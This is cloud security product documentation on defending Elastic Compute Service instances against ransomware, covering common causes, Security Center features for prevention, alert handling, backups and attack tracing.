After ransomware intrudes into an Elastic Compute Service (ECS) instance, data on the instance is encrypted and is used by attackers for ransom. This causes service interruptions, data leaks, and data loss. This topic describes the solutions that you can use to protect your ECS instances from ransomware.

Causes

In most cases, ECS instances are intruded by ransomware because risks occur when you use the ECS instances. The following list describes the risks:
  • Important accounts with weak passwords or absence of authentication mechanisms
    • Weak passwords or no passwords are configured for the important accounts of your server. The accounts include the root account and the administrator account.
    • Weak passwords or no passwords are configured for your databases on which important services are deployed. The databases include Redis, MongoDB, MySQL, and Microsoft SQL Server databases.
  • Services exposed on the Internet due to absence of access control policies

    Services such as RDP, SSH, Redis, MongoDB, MySQL, and Microsoft SQL Server can be accessed over the Internet. The services are vulnerable.

  • High-risk vulnerabilities on the operating systems and software of your servers

    High-risk vulnerabilities are detected on the operating systems and software of your servers. Attackers upload encryption ransomware or perform ransomware operations to launch remote attacks.

Solutions

To reduce the attack rate of encryption ransomware on your ECS instances, we recommend that you use a suitable solution or handle risks based on protection phases. The following table describes the different anti-ransomware solutions that are suitable for different protection phases.
Protection phase Solution Description References
Before ransomware intrusion Check security configurations.
Security Center provides the features of asset exposure analysis, baseline check, configuration assessment, and AccessKey pair leak detection. You can use the features to achieve the following purposes:
  • Ensure that you do not configure weak passwords or password-free access for the accounts of your servers or databases. This ensures the security of the accounts that can be used to access important services.
  • Ensure that unauthorized access is not allowed, and no services are exposed on the Internet.

Asset exposure analysis

Baseline check

Configuration assessment

AccessKey pair leak detection

Scan servers for vulnerabilities and fix detected vulnerabilities at the earliest opportunity. Security Center provides the vulnerability fixing feature. If Security Center detects vulnerabilities on your servers, we recommend that you use the feature to fix high-risk vulnerabilities at the earliest opportunity.

Configure scheduled vulnerability detection

Priorities to fix vulnerabilities

Exploitability of vulnerabilities

Create anti-ransomware policies for servers and databases. Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases to defend against ransomware. You can use the features to protect your servers and databases from ransomware. Backups based on anti-ransomware policies
Enable features supported by the proactive defense module. Security Center provides the proactive defense module. The features that are supported by the module can automatically intercept common viruses, malicious network connections, and webshell connections. The module allows you to use bait to capture ransomware. Security Center also provides the virus blocking feature that can be used to precisely block ransomware. Proactive defense
During ransomware intrusion Handle alerts generated by Security Center at the earliest opportunity. Security Center generates different types of alerts for your assets in real time. The types of alerts include the alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and take actions at the earliest opportunity. Alerts
After ransomware intrusion Restore encrypted data of your assets. Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases. The features allow you to create anti-ransomware policies for your servers and databases. You can back up the data on your servers and databases based on the policies. If the data on your servers or databases is encrypted by ransomware, you can create a restoration task to restore data. Backups based on anti-ransomware policies
Trace ransomware attacks. Security Center provides the feature of attack source tracing. The feature can restore attack paths based on the attack statistics collected by the Security Center agent and Graph Compute. The feature helps you view the processes and chain diagrams of ransomware intrusions. Attack source tracing

The following sections describe the features and operations related to anti-ransomware solutions.

Asset exposure analysis

You can use asset exposure analysis to minimize asset exposure and the intrusions over the Internet from attackers or mining programs and worms. We recommend that you consider Internet-facing exposure as the highest priority and handle the exposure. For more information, see Asset exposure analysis.
  • Analysis of exposed components

    Asset exposure analysis allows you to view exposed components to check whether components or services such as Redis, MongoDB, and Elasticsearch are exposed on the Internet. If a component is exposed, you can disconnect the Internet chain of the component. For example, you can configure security groups to allow requests only from specific CIDR blocks.

  • Analysis of exposed weak passwords

    If a system uses weak passwords and the passwords are exposed on the Internet, the system can be easily attacked. You must fix risks that are caused by the weak passwords at the earliest opportunity.

Baseline check

You can use the baseline check feature to check for threats in the baseline configurations that are included in the default baseline check policy. The threats include weak passwords, unauthorized access, vulnerabilities, and configuration risks. After you fix detected baseline risks on your system, databases, and software, you can prevent ransomware in an efficient manner. For more information, see Overview.

Configuration assessment

You can use the configuration assessment feature to check the following configurations of your Alibaba Cloud services for risks: identity authentication and permissions, network access control, data security, log audit, monitoring and alerting, and basic security protection. If risks are detected, Security Center provides solutions. We recommend that you handle detected high-risk items. For more information, see Overview.

AccessKey pair leak detection

You can use the feature of AccessKey pair leak detection to check the usernames and passwords in source code stored on platforms such as GitHub in real time. This helps you detect leaks of the usernames and passwords for your assets. If leaks are detected, Security Center generates alerts. This helps you detect and handle potential AccessKey pair leaks at the earliest opportunity. For more information, see Detection of AccessKey pair leaks.

Configure scheduled vulnerability detection

We recommend that you enable application vulnerability detection and specify a minimum detection cycle for scheduled vulnerability detection. The minimum detection cycle is three days. You must ensure that all vulnerabilities that are added to the vulnerability whitelist are necessary. For more information, see Configure vulnerability settings.

Priorities to fix vulnerabilities

Application whitelists are detected based on whether vulnerabilities are compliant or can be easily exploited. If detected application vulnerabilities can be easily exploited, the details about the vulnerabilities are displayed in the Security Center console, and the Proof of Concept (PoC) and Exploit of each vulnerability can be easily obtained from the Internet. These vulnerabilities can be easily exploited by attackers, mining programs, and computer worms. Therefore, you must fix the vulnerabilities that can be easily exploited based on priorities in descending order. The priorities are determined by the score of urgency to fix a vulnerability. You must also fix the vulnerabilities that are detected on unexposed services. This prevents the vulnerabilities from being exploited by attackers, mining programs, and computer worms to implement lateral movement in internal networks, which reduces adverse impacts on your assets. For more information, see Priorities to fix vulnerabilities.

Exploitability of vulnerabilities

If a large number of vulnerabilities are detected and you do not have sufficient resources to fix the vulnerabilities, you can first fix or handle the vulnerabilities that affect the security at the Internet boundary. This way, you can ensure the security at the Internet boundary and have sufficient time to fix the remaining vulnerabilities on your system. The following list describes how to fix and handle vulnerabilities:
  • Fix vulnerabilities

    Follow the solutions included in vulnerability details.

  • Handle vulnerabilities

    Click the ID of a security group or an instance to go to the page that displays the configurations of the specified security group, Server Load Balancer (SLB) instance, or Network Address Translation (NAT) gateway. On the page, delete the port forwarding rule that exposes your services on the Internet, or configure the security group to allow requests only from specific IP addresses or CIDR blocks. If you handle a vulnerability, you still need to fix the vulnerability.

    For more information about how to fix a vulnerability, see Overview.

Alerts

Security Center generates different types of alerts for your assets in real time. The types of alerts include the alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and take actions at the earliest opportunity.

You can perform the following steps to handle alerts on ransomware:

  1. Log on to the Security Center console.
  2. In the left-side navigation pane, choose Detection > Alerts.
  3. In the alert list of the Alerts page, find the alert on ransomware and click Process in the Actions column.
  4. In the dialog box that appears, set Process Method to Anti-Virus and select Isolate the source file of the process.
  5. Click Process Now.
    After you isolate the source file of a malicious process, the process can no longer be started.
  6. Log on to the server on which the alert is generated and check whether a suspicious scheduled task exists in the crontab file.
    If a suspicious scheduled task exists, you must delete or comment out the task.

Proactive defense

Security Center provides the proactive defense module. The features that are supported by the module can automatically intercept common viruses, malicious network connections, and webshell connections. The module allows you to use bait to capture ransomware. Security Center also provides the virus blocking feature. You can use the feature to block ransomware before a ransomware attack occurs. For more information about how to enable the virus blocking feature, see Use proactive defense.

Ransomware may adversely affect the Security Center agent. We recommend that you enable the client protection feature. For more information about how to enable the client protection feature, see Use the client protection feature.

Backups based on anti-ransomware policies

Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases to defend against ransomware. You can use the features to protect your servers and databases from ransomware.
  • Anti-ransomware for servers

    You can use the anti-ransomware feature of Security Center to create anti-ransomware policies for your server. The server can be an ECS instance, a server that is not deployed on Alibaba Cloud, a server that is deployed in the classic network, or a server that is deployed in a virtual private cloud (VPC). After you create an anti-ransomware policy, Security Center automatically backs up data in protected directories on your server. If your server is attacked by ransomware, you can restore data based on the backups. This prevents negative impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.

  • Anti-ransomware for databases

    You can create anti-ransomware policies for the following types of databases that are deployed on ECS instances to back up data in the databases: MySQL, Oracle, and SQL Server databases. If your database is intruded by ransomware, you can restore data in the database based on the backups. This prevents adverse impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.

Configuration suggestions
  • Data backup consumes network bandwidth. We recommend that you specify the backup start time to a point in time within off-peak hours. You can configure the Start Time parameter in an anti-ransomware policy based on your business requirements. We recommend that you specify the backup start time to a point in time within the off-peak hours and make sure that the time is not the start of an hour. If you perform full backup for the first time or perform incremental backup for a large number of files, the backup may take several hours.
  • We recommend that you specify only specific directories that you want to protect when you create an anti-ransomware policy. This helps release the anti-ransomware capacity and minimize the impacts on the performance of your server.
  • We recommend that you check the anti-ransomware capacity on a regular basis to ensure that you have sufficient anti-ransomware capacity. If the anti-ransomware capacity is insufficient and you do not purchase additional anti-ransomware capacity or delete backup data to release the anti-ransomware capacity, data backup is stopped. The backup data is automatically deleted after the specified retention period.
  • If you back up a directory of an ECS instance to which an Apsara File Storage NAS (NAS) file system or Object Storage Service (OSS) bucket is mounted, the data in the NAS file system or OSS bucket is backed up. We recommend that you exclude mount directories when you specify directories to protect, or specify only necessary data in the mount directories to protect.
  • A large number of data fragments can cause high disk space usage, log storage usage, and memory usage. We recommend that you clear data from your disks on a regular basis. For more information about how to clear data from a disk, see Release disk space occupied by backup caches.

Attack source tracing

Security Center provides the feature of attack source tracing. The feature can restore attack paths based on the attack statistics collected by the Security Center agent and Graph Compute. The feature helps you view the processes and chain diagrams of ransomware intrusions. For more information, see Use attack source tracing.